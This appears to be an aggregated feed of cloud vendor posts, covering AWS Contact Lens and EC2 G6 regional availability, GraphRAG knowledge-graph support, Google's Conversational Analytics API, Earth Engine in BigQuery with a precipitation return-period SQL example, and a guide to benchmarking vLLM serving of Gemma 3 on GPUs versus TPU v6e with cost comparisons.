Amazon Connect Contact Lens now supports external voice in the Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), and Europe (London) AWS Regions. Amazon Connect integrates with other voice systems for real-time and post-call analytics to help improve customer experience and agent performance with your existing voice system.
Amazon Connect Contact Lens provides call recordings, conversational analytics (including contact transcript, generative AI post-contact summary, sensitive data redaction, contact categorization, theme detection, sentiment analysis, and real-time alerts), and generative AI for automating evaluations of up to 100% of customer interactions (including evaluation forms, automated evaluation, supervisor review) with a rich user experience to display, search and filter customer interactions, and programmatic access to data streams and the data lake. If you are an existing Amazon Connect customer, you can expand your use of Contact Lens to other voice systems for consistent analytics in a single data warehouse. If you want to migrate your contact center to Amazon Connect, you can start with Contact Lens analytics and performance insights before migrating their agents.
Starting today, the Amazon Elastic Compute Cloud (Amazon EC2) G6 instances powered by NVIDIA L4 GPUs are now available in Middle East (UAE). G6 instances can be used for a wide range of graphics-intensive and machine learning use cases.
Customers can use G6 instances for deploying ML models for natural language processing, language translation, video and image analysis, speech recognition, and personalization as well as graphics workloads, such as creating and rendering real-time, cinematic-quality graphics and game streaming. G6 instances feature up to 8 NVIDIA L4 Tensor Core GPUs with 24 GB of memory per GPU and third generation AMD EPYC processors. They also support up to 192 vCPUs, up to 100 Gbps of network bandwidth, and up to 7.52 TB of local NVMe SSD storage.
Amazon EC2 G6 instances are already available today in the AWS US East (N. Virginia and Ohio) , US West (Oregon), Europe (Frankfurt, London, Paris, Spain, Stockholm and Zurich), Asia Pacific (Mumbai, Tokyo, Malaysia, Seoul and Sydney), South America (Sao Paulo) and Canada (Central) regions. Customers can purchase G6 instances as On-Demand Instances, Reserved Instances, Spot Instances, or as part of Savings Plans.
Today, we are announcing the support of Bring Your Own Knowledge Graph (BYOKG) for Retrieval-Augmented Generation (RAG) using the open-source GraphRAG Toolkit. This new capability allows customers to connect their existing knowledge graphs to large language models (LLMs), enabling Generative AI applications that deliver more accurate, context-rich, and explainable responses grounded in trusted, structured data.
Previously, customers who wanted to use their own curated graphs for RAG had to build custom pipelines and retrieval logic to integrate graph queries into generative AI workflows. With BYOKG support, developers can now directly leverage their domain-specific graphs, such as those stored in Amazon Neptune Database or Neptune Analytics, through the GraphRAG Toolkit. This makes it easier to operationalize graph-aware RAG, reducing hallucinations and improving reasoning over multi-hop and temporal relationships. For example, a fraud investigation assistant can query a financial services company’s knowledge graph to surface suspicious transaction patterns and provide analysts with contextual explanations. Similarly, a telecom operations chatbot can detect that a series of linked cell towers are consistently failing, trace the dependency paths to affected network switches, and then guide technicians using SOP documents on how to resolve the issue. Developers simply configure the GraphRAG Toolkit with their existing graph data source, and it will orchestrate retrieval strategies that use graph queries alongside vector search to enhance generative AI outputs.
Decision-makers, employees, and customers all need answers where they work: in the applications they use every day. In recent years, the rise of AI-powered BI has transformed our relationship with data, enabling us to ask questions in natural language and get answers fast. But even with support for natural language, the insights you receive are often confined to the data in your BI tool. At Google Cloud, our goal is to change this.
At Google Cloud Next 25, we introduced the Conversational Analytics API, which lets developers embed natural-language query functionality in custom applications, internal tools, or workflows, all backed by trusted data access and scalable, reliable data modeling. The API is already powering first-party Google Cloud conversational experiences including Looker and BigQuery data canvas, and is available for Google Cloud developers of all stripes to implement wherever their imagination takes them. Today we release the Conversational Analytics API in public preview.Start building with our documentation.
The Conversational Analytics API lets you build custom data experiences that provide data, chart, and text answers while leveraging Looker’s trusted semantic model for accuracy or providing critical business and data context to agents in BigQuery. You can embed this functionality to create intuitive data experiences, enable complex analysis via natural language, and even orchestrate conversational analytics agents as ‘tools’ for an orchestrator agent using Agent Development Kit.
The Google Health Population app is being developed with the Conversational Analytics API
Getting to know the Conversational Analytics API
The Conversational Analytics API allows you to interact with your BigQuery or Looker data through chat, from anywhere. Embed side-panel chat next to your Looker dashboards, invoke agents in chat applications like Slack, customize your company’s web applications, or build multi-agent systems.
This API empowers your team to obtain answers precisely when and where they are needed, directly within their daily workflows. It achieves this by merging Google’s advanced AI models and agentic capabilities with Looker’s semantic layer and BigQuery’s context engineering services. The result is natural language experiences that can be shared across your organization, making data-to-insight interaction seamless in your company’s most frequently used applications.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebcfb3c6280>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Building with Google’s Analytics and AI stack comes with significant benefits in accurate question answering:
Best-in-class AI for data analytics
An agentic architecture that enables the system to perceive its environment and take actions
Access to Looker’s powerful semantic layer for trustworthy answers
High-performance agent tools, including software functions, charts and APIs, supported by dedicated engineering teams
Trust your data is secure with data with row and column level access controls by default
Guard against expensive queries with built-in query limitations
When pairing Conversational Analytics API with Looker, Looker’s semantic layer reduces data errors in gen AI natural language queries by as much as two thirds, so that queries are sourced in truth.
Looker’s semantic layer ensures your conversational analytics are grounded in data truth.
An agentic architecture powered by Google AI
The Conversational Analytics API uses purpose-built models for querying and analyzing data to provide accurate answers, while its flexible agentic architecture lets you configure which capabilities the agent leverages to best provide users with answers to their questions.
Conversational Analytics leverages an agentic architecture to empower agent creators with the right tools.
As a developer, you can compose AI-powered agents with the following tools:
Text-to-SQL, trusted by customers using Gemini in BigQuery
Context retrieval, informed by personalized and organization usage
Looker’s NL-to-Looker Query Engine, to leverage the analyst-curated semantic layer
Code Interpreter, for advanced analytics like forecasting and root-cause analysis
Charting, to create stunning visualizations and bring data to life
Insights, to explain answers in plain language
These generative AI tools are built upon Google’s latest Gemini models and fine-tuned for specific data analysis tasks to deliver high levels of accuracy. There’s also the Code Interpreter for Conversational Analytics, which provides computations ranging from cohort analysis to period-over-period calculations. Currently in preview, Code Interpreter turns you into a data scientist without having to learn advanced coding or statistical methods. Sign up for early access here.
Context retrieval and generation
A good data analyst isn’t just smart, but also deeply knowledgeable about your business and your data. To provide the same kind of value, a “chat with your data” experience should be just as knowledgeable. That’s why the Conversational Analytics API prioritizes gathering context about your data and queries.
Thanks to retrieval augmented generation (RAG), our Conversational Analytics agents know you and your data well enough to know that when you’re asking for sales in “New York” or “NYC,” you mean “New York City.” The API understands your question’s meaning to match it to the most relevant fields to query, and learns from your organization, recognizing that, for example, “revenue_final_calc” may be queried more frequently than “revenue_intermediate” in your BigQuery project, and adjusts accordingly. Finally, the API learns from your past interactions; it will remember that you queried about “customer lifetime value” in BigQuery Studio on Tuesday when you ask about it again on Friday.
Not all datasets have the context an agent needs to do its work. Column descriptions, business glossaries, and question-query pairs can all improve an agent’s accuracy, but they can be hard to create manually— especially if you have 1,000 tables in your business, each with 500 fields. To speed up the process of teaching your agent, we are including AI-assisted context, using Gemini to suggest metadata that might be useful for your agent to know, while letting you approve or reject changes.
Low maintenance burden
The Conversational Analytics API gives you access to the latest data agent tools from Google Cloud, so you can focus on building your business, not building more agents. You benefit from Google’s continued advancements in generative AI for coding and data analysis.
When you create an agent, we protect your data with Google’s security, best practices, and role-based access controls. Once you share your Looker or BigQuery agent, it can be used across Google Cloud products, such as Agent Development Kit, and in your own applications.
The Conversational Analytics API lets you interact with your data anywhere.
API powered chats from anywhere
With agents consumable via API, you can surface insights anywhere decision makers need them—whether it’s when speaking with a customer over a support ticket, via a tablet when you’re in the field, or in your messaging apps.
The Conversational Analytics API is designed to bring benefits to all users, whether they be business users, data analysts building agents, or software developers. With Conversational Agents, when a user asks a question, answers are delivered rapidly alongside the agent’s thinking process, to ensure the right approach to gaining insights is used. Individual updates allow your developers to control what a user sees — like answers and charts — and what you want to log for later auditing by analysts — like SQL and Python code.
Geospatial analytics can transform rich data into actionable insights that drive sustainable business strategy and decision making. At Google Cloud Next ‘25, we announced the preview of Earth Engine in BigQuery, an extension of BigQuery’s current geospatial offering, focused on enabling data analysts to seamlessly join their existing structured data with geospatial datasets derived from satellite imagery. Today, we’re excited to announce the general availability of Earth Engine in BigQuery and the preview of a new geospatial visualization capability in BigQuery Studio. With this new set of tools, we’re making geospatial analysis more accessible to data professionals everywhere.
Bringing Earth Engine to data analysts
Earth Engine in BigQuery makes it easy for data analysts to leverage core Earth Engine capabilities from within BigQuery. Organizations using BigQuery for data analysis can now join raster (and other data created from satellite data) with vector data in their workflows, opening up new possibilities for use cases such as assessing natural disaster risk over time, supply chain optimization, or infrastructure planning based on weather and climate risk data.
This initial release introduced two features:
ST_RegionStats()geography function: A new BigQuery geography function enabling data analysts to derive critical statistics (such as wildfire risk, average elevation, or probability of deforestation) from raster (pixel-based) data within defined geographic boundaries.
Earth Engine datasets in BigQuery Sharing: A growing collection of 20 Earth Engine raster datasets available in BigQuery Sharing (formerly Analytics Hub), offering immediate utility for analyzing crucial information such as land cover, weather, and various climate risk indicators.
What’s new in Earth Engine in BigQuery
With the general availability of Earth Engine in BigQuery, users can now leverage an expanded set of features, from what was previously available in preview:
Enhanced metadata visibility: A new Image Details tab in BigQuery Studio provides expanded information on raster datasets, such as band and image properties. This makes geospatial dataset exploration within BigQuery easier than ever before.
Improved usage visibility:View slot-time used per job and set quotas for Earth Engine in BigQuery to control your consumption, allowing you to manage your costs and better align with your budgets.
We know visualization is crucial to understanding geospatial data and insights in operational workflows. That’s why we’ve been working on improving visualization for the expanded set of BigQuery geospatial capabilities. Today, we’re excited to introduce map visualizationin BigQuery Studio, now available in preview.
You might have noticed that the “Chart” tab in the query results pane of BigQuery Studio is now called “Visualization.” Previously, this tab provided a graphical exploration of your query results. With the new Visualization tab, you’ll have all the previous functionality and a new capability to seamlessly visualize geospatial queries (containing a GEOGRAPHY data type) directly on a Google Map, allowing for:
Instant map views: See your query results immediately displayed on a map, transforming raw data into intuitive visual insights.
Interactive exploration: Inspect results, debug your queries, and iterate quickly by interacting directly with the map, accelerating your analysis workflow.
Customized visualization: Visually explore your query results with easy-to-use, customizable styling options, allowing you to highlight key patterns and trends effectively.
Built directly into BigQuery Studio’s query results, map visualization simplifies query building and iteration, making geospatial analysis more intuitive and efficient for everyone.
Visualization tab displays a heat map of census tracts in Colorado with the highest wildfire risk using the Wildfire Risk to Community dataset
Example: Analyzing extreme precipitation events
The integration of Earth Engine in BigQuery with map visualization within a single platform creates a powerful and unified geospatial analytics platform. This allows analysts to move from data discovery to complex analysis and visualization within a single platform, significantly reducing the time to insight. For businesses, this offers powerful new capabilities for assessing climate risk directly within their existing data workflows.
Consider a scenario where an insurance provider needs to assess how hydroclimatic risk is changing across its portfolio in Germany. Using Earth Engine in BigQuery, the provider can analyze decades of climate data to identify trends and changes in extreme precipitation events.
The first step is to access the necessary climate data. Through BigQuery Sharing, you can subscribe to Earth Engine datasets directly. For this analysis, we’ll use the ERA5 Land Daily Aggregates dataset (daily grid or “image” weather maps) to track historical precipitation.
BigQuery Sharing listings for Earth Engine with the ERA5 Daily Land Aggregates highlighted (left) and the dataset description with the “Subscribe” button (right)
By subscribing to the dataset, we can now query it. We use the ST_RegionStats() function to calculate statistics (like the mean or sum) for an image band over a specified geographic area. In the query below, we calculate the mean daily precipitation for a subset of counties in Germany for each day in our time range and then find the maximum value for each year:
Next, we analyze the output from the first query to identify changes in extreme event frequency. To do this, we calculate return periods. A return period is a statistical estimate of how likely an event of a certain magnitude is to occur. For example, a “100-year event” is not one that happens precisely every 100 years, but rather an event so intense that it has a 1% (1/100) chance of happening in any given year. This query compares two 30-year periods (1980-2010 vs. 1994-2024) to see how the precipitation values for different return periods have changed:
Note: This query can only be run in US regions. The Overture dataset is US-only. In addition, Earth Engine datasets are rolling out to EU regions over the coming weeks.
code_block
<ListValue: [StructValue([(‘code’, “– This UDF implements the Gumbel distribution formula to estimate the event magnitudern– for a given return period based on the sample mean (xbar) and standard deviation (sigma).rnCREATE TEMP FUNCTIONrnCalculateReturnPeriod(period INT64, xbar FLOAT64, sigma FLOAT64)rn RETURNS FLOAT64 AS ( ROUND(-LOG(-LOG(1 – (1 / period))) * sigma * .7797 + xbar – (.45 * sigma), 4) );rnrnrnWITHrn– Step 1: Define the analysis areas.rn– This CTE selects a specific subset of 10 major German cities.rn– ST_SIMPLIFY is used to reduce polygon complexity, improving query performance.rnCounties AS (rnFROM bigquery-public-data.overture_maps.division_arearn|> WHERE country = ‘DE’ AND subtype = ‘county’rn AND names.primary IN (rn ‘München’,rn ‘Köln’,rn ‘Frankfurt am Main’,rn ‘Stuttgart’,rn ‘Düsseldorf’)rn|> SELECTrn id,rn names.primary AS county,rn ST_SIMPLIFY(geometry,500) AS geometryrn),rn– Step 2: Define the time periods for comparison.rn– These two 30-year, overlapping epochs will be used to assess recent changes.rnEpochs AS (rn FROM UNNEST([rn STRUCT(‘e1’ AS epoch, 1980 AS start_year, 2010 AS end_year),rn STRUCT(‘e2’ AS epoch, 1994 AS start_year, 2024 AS end_year)])rn),rn– Step 3: Define the return periods to calculate.rnReturnPeriods AS (rn FROM UNNEST([10,25,50,100,500]) AS years |> SELECT *rn),rn– Step 4: Select the relevant image data from the Earth Engine catalog.rn– Replace YOUR_CLOUD_PROJECT with your relevant Cloud Project ID.rnImages AS (rn FROM YOUR_CLOUD_PROJECT.era5_land_daily_aggregated.climatern |> WHERE year BETWEEN 1980 AND 2024rn |> SELECTrn id AS img_id,rn start_datetime AS img_datern)rn– Step 5: Begin the main data processing pipeline.rn– This creates a processing task for every combination of a day and a county.rnFROM Imagesrn|> CROSS JOIN Countiesrn– Step 6: Perform zonal statistics using Earth Engine.rn– ST_REGIONSTATS calculates the mean precipitation for each county for each day.rn|> SELECTrnimg_id,rnCounties.id AS county_id,rnEXTRACT(YEAR FROM img_date) AS year,rnST_REGIONSTATS(geometry, img_id, ‘total_precipitation_sum’) AS areal_precipitation_statsrn– Step 7: Find the annual maximum precipitation.rn– This aggregates the daily results to find the single wettest day for each county within each year.rn|> AGGREGATErnSUM(areal_precipitation_stats.count) AS pixels_examined,rnMAX(areal_precipitation_stats.mean) AS yearly_max_1day_precip,rnANY_VALUE(areal_precipitation_stats.area) AS pixel_arearnGROUP BY county_id, yearrn– Step 8: Calculate statistical parameters for each epoch.rn– Joins the annual maxima to the epoch definitions and then calculates thern– average and standard deviation required for the Gumbel distribution formula.rn|> JOIN Epochs ON year BETWEEN start_year AND end_yearrn|> AGGREGATErn AVG(yearly_max_1day_precip * 1e3) AS avg_yearly_max_1day_precip,rn STDDEV(yearly_max_1day_precip * 1e3) AS stddev_yearly_max_1day_precip,rn GROUP BY county_id, epochrn– Step 9: Calculate the return period precipitation values.rn– Applies the UDF to the calculated statistics for each return period.rn– This assumes they are the same function.rn|> CROSS JOIN ReturnPeriods rprn|> EXTENDrn CalculateReturnPeriod(rp.years, avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip) AS est_max_1day_preciprn|> DROP avg_yearly_max_1day_precip, stddev_yearly_max_1day_preciprn– Step 10: Pivot the data to create columns for each epoch and return period.rn– The first PIVOT transforms rows for ‘e1’ and ‘e2’ into columns for direct comparison.rn|> PIVOT (ANY_VALUE(est_max_1day_precip) AS est_max_1day_precip FOR epoch IN (‘e1’, ‘e2’))rn– The second PIVOT transforms rows for each return period (10, 25, etc.) into columns.rn|> PIVOT (ANY_VALUE(est_max_1day_precip_e1) AS e1, ANY_VALUE(est_max_1day_precip_e2) AS e2 FOR years IN (10, 25, 50, 100, 500))rn– Step 11: Re-attach county names and geometries for the final output.rn|> LEFT JOIN Counties ON county_id = Counties.idrn– Step 12: Calculate the final difference between the two epochs.rn– This creates the delta values that show the change in precipitation magnitude for each return period.rn|> SELECTrncounty,rnCounties.geometry,rne2_10 – e1_10 AS est_10yr_max_1day_precip_delta,rne2_25 – e1_25 AS est_25yr_max_1day_precip_delta,rne2_50 – e1_50 AS est_50yr_max_1day_precip_delta,rne2_100 – e1_100 AS est_100yr_max_1day_precip_delta,rne2_500 – e1_500 AS est_500yr_max_1day_precip_deltarn|> ORDER BY county”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ebcfc2a2ca0>)])]>
To provide quick results as a demonstration, the example query above filters for five populated counties; running the computation for all of Germany would take much longer. When running the analysis for many more geometries (areas of interest), you can break the analysis into two parts:
Calculate the historical time series of maximum daily precipitation for each county in Germany from 1980-2024 and save the resulting table.
Use these results to calculate and compare precipitation return periods for two distinct timeframes.
With the analysis complete, the results can be immediately rendered using the new Visualization feature in BigQuery Studio. This allows the insurance provider to:
Pinpoint high-risk zones: Visually identify clusters of counties with increasing extreme precipitation, for proactive risk mitigation and to optimize policy pricing.
Communicate insights: Share interactive maps with stakeholders, making complex risk assessments understandable at a glance.
Inform strategic decisions: This type of analysis is not limited to insurance. For example, a consumer packaged goods (CPG) company could use these insights to optimize warehouse and distribution center locations, situating them in areas with more stable climate conditions.
Running BigQuery analysis for changing extreme precipitation events in Germany and interactively exploring the results with the new Map visualization
This combination of Earth Engine, BigQuery, and integrated visualization helps businesses move beyond reactive measures, enabling data-driven foresight in a rapidly changing world.
The future of geospatial analysis is here
With the general availability of Earth Engine in BigQuery and the preview of map visualization, we’re helping data professionals across industries to unlock richer, more actionable insights from their geospatial data. From understanding climate risk for buildings in flood-prone areas to optimizing enterprise planning and supply chains, these tools are designed to power operational decision making, helping your business thrive in an increasingly data-driven landscape.
We are continuously working to expand the utility and accessibility of this new set of capabilities, including:
Growing catalog of datasets: Expect more datasets for both Earth Engine and BigQuery Sharing, allowing you to leverage analysis-ready datasets for individual or combined use with custom datasets.
Intelligent geospatial assistance: We envision a future where advanced AI and code generation capabilities will further streamline geospatial workflows. Stay tuned for more on this later this year!
Additional contributors include Hossein Sarshar, Ashish Narasimham, and Chenyang Li.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottoms-up approach to determining the best accelerator for your use case and optimizing your vLLM’s configuration to achieve the best and most cost effective results possible.
Note: This guide assumes that you are familiar with xPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal set up from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the xPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
Selecting Accelerators (xPU)
We live in a world of resource scarcity! What does this mean for your use case? It means that of course you could probably get the best possible latency and throughput by using the most up to date hardware – but as an engineer it makes no sense to do this when you can achieve your requirements at a better price/performance point.
Identifying Candidate Accelerators
We can refer to our Accelerator-Optimized Machine Family of Google Cloud Instances to determine which accelerator-optimized instances are viable candidates.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the “Calculate Memory Requirements” section.
The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.
Accelerator-optimized Options
g2-standard-48
Provides 4 accelerators with 96 GB of GDDR6
TP = 4
a2-ultragpu-1g
Provides 1 accelerator with 80 GB of HBM
TP = 1
a3-highgpu-1g
Provides 1 accelerator with 80GB of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory from our model weights, activations, and overhead plus the KV Cache memory.
model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking apart a large model across multiple accelerators (xPU) so that the model can actually fit on the hardware we need. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPU’s because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM respectively and mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while a single accelerator instance would not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates, it is time to see the best level of performance we can across each potential setup. We will only overview an anonymized accelerator-optimized instance and Trillium (v6e) benchmarking & tuning in this section – but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
Accelerator-optimized Machine Type
In your project, open the Cloud Shell and enter the following command to launch your chosen instance and its corresponding accelerator and accelerator count. Be sure to update your project ID accordingly and select a zone that supports your machine type for which you have quota.
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail — if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh that we need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
code_block
<ListValue: [StructValue([(‘code’, ‘# navigate to correct directoryrncd benchmarks/auto_tunernrn# update the auto_tune.sh script – user your preferred script editorrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdbac0>)])]>
In the auto_tune.sh script, you will need to make the following updates:
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow up server resulting in what appears to be a hang. If either happens, edit the auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than beginning at 0.98.
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In our results.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute TPU benchmarking and the previously described process.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
<ListValue: [StructValue([(‘code’, ‘# Monitor creationrngcloud compute tpus queued-resources list –zone $ZONE –project $PROJECT’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8fd0>)])]>
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with our other machine type.
code_block
<ListValue: [StructValue([(‘code’, ‘# Head to main working directoryrncd benchmarks/auto_tune/rnrn# install required libraryrnapt-get install bcrnrn# Provide HF_TOKENrnexport HF_TOKEN=XXXXXXXXXXXXXXXXXXXXXrnrn# update auto_tune.sh with your preferred script editor and launch auto_tunerrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8b20>)])]>
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:
code_block
<ListValue: [StructValue([(‘code’, ‘start_server() {rnrn…rnrn for i in {1..60}; do rn RESPONSE=$(curl -s -X GET “http://0.0.0.0:8004/health” -w “%{http_code}” -o /dev/stdout)rn STATUS_CODE=$(echo “$RESPONSE” | tail -n 1) rn if [[ “$STATUS_CODE” -eq 200 ]]; thenrn server_started=1rn breakrn elsern sleep 10 # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONGrn firn donern if (( ! server_started )); thenrn echo “server did not start within 10 minutes. Please check server log at $vllm_log”.rn return 1rn elsern return 0rn firn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8a60>)])]>
The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the anonymized candidate and the TPU v6e.
Anonymized Accelerator-optimized Candidate
Measured Throughput: The benchmark showed a single vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is:
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for our anonymized machine type in us-central1 was approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing for the simple cost figures, this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster:
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
Metric
Anonymized Candidate
TPU (v6e-4)
Throughput per Instance
4.17 req/s
5.63 req/s
Instances Needed (100 req/s)
24
18
Spot Instance Cost Per Hour
$2.25 / hour
$0.56 x 4 chips = $2.24 / hour
Spot Cost Total
$54.00 / hour
$40.32 / hour
Total Monthly Cost (730h)
~ $39,400
~ $29,400
